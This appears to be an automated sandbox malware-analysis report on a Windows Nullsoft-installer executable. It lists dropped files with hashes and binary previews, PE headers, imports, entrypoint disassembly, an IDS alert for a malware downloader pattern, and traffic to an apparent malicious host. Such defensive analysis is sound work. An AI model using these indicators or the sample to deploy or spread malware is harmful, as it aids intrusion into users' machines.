Preview:	L..................F........................................................e....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....r.1...........punktnedslagenes..R............................................p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s... .n.2...........Suspired157.Ege.P............................................S.u.s.p.i.r.e.d.1.5.7...E.g.e.......=.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s.\.S.u.s.p.i.r.e.d.1.5.7...E.g.e.8.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.b.r.u.g.s.e.r.\.b.r.u.g.o.\.O.b.s.t.e.t.r.i.k.e.r.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Roaming\brugser\brugo\Jettisoned.Fed

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	data
Category:	dropped
Size (bytes):	295837
Entropy (8bit):	7.485285267564396
Encrypted:	false
SSDEEP:	6144:6kF7pUvuvCIv8qXCQnXa3i45gOkf9r001oK/gRrqAp5ktoP5Q:6kFO6CbgnqFNY9AbesZfHe
MD5:	97E5FA6EF225AEE82B0A518A5ED7CF96
SHA1:	CC886F0D87EB0C43D54FC4F8E29498C01F626B23
SHA-256:	D8386CD5AE1CE0C3232BDEE60DF363ECFB93839D8C7DC6CCAEA62427A6F9E1D3
SHA-512:	A7CB4DC6844AEBA16563F263458DB0413B2FD3F1194D302C601DCDF67BAD03E9C679117C398E345078F253D1A2E15F7BFB12B3E571B6BEECFEE63CDC75FEAFA2
Malicious:	false
Preview:	....2.....`..;;..RR......DDDD.........O...........................zz............===..........................\|\|......===.................S....8.................\|.""""".q..66....E.g.99.............mm.K......(.............3...........d.............dd..................B...RR..............;......................N............&&&......^^.0.FFF....................#.....XXXXX...^^........7....c.........I..:....=.........................C...............O.....ZZZZZ......VVV...?.///......??..............Q.......*..""""...........ppp.....66.......D.........222.D....E..............................L............\|..))...>>................\|......................................333.::...N..........I....................-...........w........................II........Y.....@...................o...................qq..HHH.3.UU....]].......~.H....llll....NNN............)))).X..........\|.......:.l...#####....===................33..............CCCC......$$......H.....&.{.R.ss.:....!....................r........

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\Gonging.Tri

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	data
Category:	dropped
Size (bytes):	149743
Entropy (8bit):	4.604925606492152
Encrypted:	false
SSDEEP:	1536:zxLCFeQoj1XC9JY1Hsblg6Cyb17LQDvvJJCw/g24vRmjcxcAKBN4JklSVYf/d:x/jC6MRg6C6CpJO2yRmjceAKrxQa
MD5:	7619F1A007B17B4EF91526226E0307C0
SHA1:	7C3CAD1D64D2F3A745E80F2FAA20C5E58694ACF4
SHA-256:	CC98DCFB6D8918B1BB495DE0A7AF978C17DC675A9A074B900E81F0C7A785C222
SHA-512:	D3884CDC0F4ABF5BBAC96AECD8ECFBCEB1EF133F6BF70ED28C660EE3E8A83016DB4CB3348A5AAFC179E24C08EF64B0A704278457894649B9169CBA85E0774C03
Malicious:	false
Preview:	.............)......a........~~.....................fff..!.%.T..$$$.+...hhh..........22......K.5.................y................r.......i.nnn......CCC.......oo.........PP....E........@....&&&.......{{{{{{.......\|\|..>>....1.&......vv.nn..EEEEE............O......^. ..>.ttt.""...........2....................f.......(((....O............................X......u................}.........................MM......3333..aa..............____...................UU...TT......h.........aa...#.............<.vvvvv..........88........................(..\\...........V............I..........}...???..e..E.QQQQQ....#.........%............O.....BB..........@...........^^^.....................................f........HHHHHH.....TTT.....```.d......I...........A.uu........666....M.....&.00000000.B..uuu..))..................L.d......C..............%%......................@@@.......\|\|\|.....ee....................UUUU.......~........o.bb.........................?.......C...........y..3..999.""......u.....www.

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\grinagtigere.per

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	FoxPro FPT, blocks size 233, next free block index 1638400, field type 0
Category:	dropped
Size (bytes):	417306
Entropy (8bit):	1.25574612059914
Encrypted:	false
SSDEEP:	1536:aj7/S3pUnjTFMxKzAlcC94NT2k0ZxIM43es9K:aj7/S3pUnjit6TuZCMy9
MD5:	E3E7516A4D2A0EE5A1B1FB393811A423
SHA1:	8F31AE423FA82BB21314B716DBA950670E8CEEA3
SHA-256:	1967201FD10C90B86BDE598FF3540C07FDC143F57EBBAD9D81C461C38C210FE0
SHA-512:	1FF7CD5BEC532BCE25AC75A3070EE7986BA7B2B97A454ADD88302C894069AA3B13D739F79F1DEB23B6050412E81CA8AE3AE8D1321B2939B838BAC33191C5C058
Malicious:	false
Preview:	.............A...........2.................v.................................................................................................................[......................................................=........................................C..........i....................../....................T.[.................V.................................+........O..................n................................'~.......].........................>........................._....s.....................................................w..............................D.............................................................................................................................6'.........1...6..................................................................................d.......2................................2............................{..............3.....................$...........................................q............6................u....................

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\sarcosomal.vas

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	data
Category:	dropped
Size (bytes):	228229
Entropy (8bit):	1.2621962744718846
Encrypted:	false
SSDEEP:	768:YBW9ff3l/VBidoMDdUNnDqIOnc6ZDJJycbIb2dhcGc94l2DuFwPPfqXky4CXnDIn:tQ1yjP7y3MZem/M8ibm
MD5:	B3FC9F1CBE42201FC277CEDCA9D573D6
SHA1:	6DD83571AB9E6BEFE6A51C8EC02EACBA85D37576
SHA-256:	B97BD584BEACFBEE7D8FC3BE1220BEC44B5450696F15E02DFD9739AFC57F64E2
SHA-512:	D314052BA4909521C30184705BB8A90209465FE5DCBBDB037E4CCBFF8797E9118CE96FB432EFBAFC2DAF6EFA4A57143B9F65ADC5BFF33F80CB9A0FF9886A3B3D
Malicious:	false
Preview:	........~............... ..............................................q.......=..................................0...................................U..........................................&.............................h.....................o.....................................................................u..................4............q..t............................................................_..............................i..#...........................................................r...............................c........C............*...................Qz..P.................................f.......................N.........+...............................\................................................................@.................................................3............:..............................................W........................................................ .........:..............q..................c....+........................F.......^..

C:\Users\user\AppData\Roaming\brugser\brugo\Ornithoscopist180.ker

Download File

Process:	C:\Users\user\Desktop\ix8kxoBHDb.exe
File Type:	data
Category:	dropped
Size (bytes):	201388
Entropy (8bit):	1.2599777401529801
Encrypted:	false
SSDEEP:	768:ZIOwv7/4y518Ym+iRHdKfXfxpG2qBly2QZK9jj8xuFpHl6GaKO61ai4CQPqW2WGG:OpVfamJe9tL+c
MD5:	CDE4889F58D3EB5A7065C9E5987E8177
SHA1:	56684A59AD1D585BF075027112AF276335EACD32
SHA-256:	5EDDD57B4C7571FCD676FC13204457E8B91AD438E9B366B446254DFD3AD7AF80
SHA-512:	CB8813AD174A64CC9E2CEC9B70A3834090491BEAB794F090E6DE1F1758371A67226392F4D2E7F38D16EDC6FDF1D5B983FFC5DB9AEFC242154D8C025CCD812BA7
Malicious:	false
Preview:	......................................~................................x........a.........................................................................v.....................................................................+....................................]............................7...#...................................................=.....z.........................................................................................................................*...............S....P2....K..........Y...............................................t.............E...C.....................................g................................................................................{..................................W...(.............(.................x...............................................................).............................................&................a..........................................................................................Z.f...........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.954530383366024
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ix8kxoBHDb.exe
File size:	514'430 bytes
MD5:	d09dbfcaacc4e72dc2ff2d9119b7b9f1
SHA1:	8691ac9bbabbe829446b56c73888d8a0adf0b92b
SHA256:	d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb
SHA512:	b263e88a053292dd0f12dffc01be23e90198fb05591bacab6471afdc9a49254c65ab560301edada29e4051f698ad8bb1de1e6563338e7ea51ca3032670f0c75f
SSDEEP:	12288:B7MyjkhHoKi/5FeA7Bp8YNs8z0UTcmQo8CJsGmZ:B7M86ghxTRdJshZ
TLSH:	CBB423C07F80A06BFD765239BEFB6E6522B35F0209E11607DF80564DBE306B5819A727
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	3672584dcccc5859

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F0A28D3CF83h
push ebx
call 00007F0A28D4024Dh
cmp eax, ebx
je 00007F0A28D3CF79h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F0A28D401C7h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F0A28D3CF5Ch
push 0000000Ah
call 00007F0A28D40220h
push 00000008h
call 00007F0A28D40219h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F0A28D4020Dh
cmp eax, ebx
je 00007F0A28D3CF81h
push 0000001Eh
call eax
test eax, eax
je 00007F0A28D3CF79h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x3160	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6409	0x6600	bfe2b726d49cbd922b87bad5eea65e61	False	0.6540287990196079	data	6.416186322230332	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1396	0x1400	d45dcba8ca646543f7e339e20089687e	False	0.45234375	data	5.154907432640367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	8575fc5e872ca789611c386779287649	False	0.5026041666666666	data	4.004402321344153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x27000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x3160	0x3200	5fdda3be35833d5b81b736432c211617	False	0.491640625	data	5.547370199718841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x52208	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4990663900414938
RT_DIALOG	0x547b0	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x548d0	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x549f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x54ab8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x54b18	0x14	data	English	United States	1.15
RT_VERSION	0x54b30	0x2ec	data	English	United States	0.49732620320855614
RT_MANIFEST	0x54e20	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:11:49.256053+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.11	49867	164.160.91.32	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:11:47.753979921 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:47.754017115 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:47.754091024 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:47.764394045 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:47.764404058 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:48.674989939 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:48.675084114 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:48.737890959 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:48.737912893 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:48.738262892 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:48.738709927 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:48.742012978 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:48.787326097 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.256073952 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.256148100 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.256170034 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.257478952 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.482630014 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.482641935 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.482680082 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.482935905 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.482935905 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.482955933 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.483799934 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.483818054 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.484026909 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.484026909 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.484038115 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.485120058 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.709111929 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.709136963 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.709198952 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.709213972 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.709249973 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.709392071 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.710115910 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.710135937 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.710372925 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.710382938 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.710454941 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.711468935 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.711492062 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.711549997 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.711560011 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.711647987 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.711647987 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.713237047 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.713257074 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.713371992 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.713371992 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.713380098 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.715437889 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.935952902 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.935976028 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.936100006 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.936110973 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.936259031 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.936820030 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.936840057 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.936887980 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.936896086 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.936930895 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.936930895 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.937417030 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.937433004 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.937550068 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.937558889 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.937675953 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.940434933 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940452099 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940582991 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.940602064 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940671921 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.940731049 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940747976 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940793037 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.940802097 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.940834045 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.941582918 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.941598892 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.941669941 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.941678047 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:49.941706896 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:49.942410946 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.022469044 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.022490025 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.022561073 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.022572041 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.022737026 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.162600994 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.162626982 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.162766933 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.162785053 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.162862062 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163172007 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163187981 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163239002 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163274050 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163310051 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163310051 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163366079 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163383007 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163484097 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163491964 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163553953 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.163750887 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.163769007 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164098978 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164108038 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164129972 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164159060 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164199114 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164453983 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164477110 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164511919 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164527893 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164566994 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164566994 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164882898 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164900064 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.164985895 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164985895 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.164994001 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.165072918 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.165210962 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.165226936 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.165292978 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.165302992 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.165319920 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.165369034 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.249175072 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249191046 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249268055 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.249280930 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249313116 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.249399900 CET	49867	443	192.168.2.11	164.160.91.32
Jan 11, 2025 08:11:50.249660969 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249675989 CET	443	49867	164.160.91.32	192.168.2.11
Jan 11, 2025 08:11:50.249769926 CET	49867	443	192.168.2.11	164.160.91.32
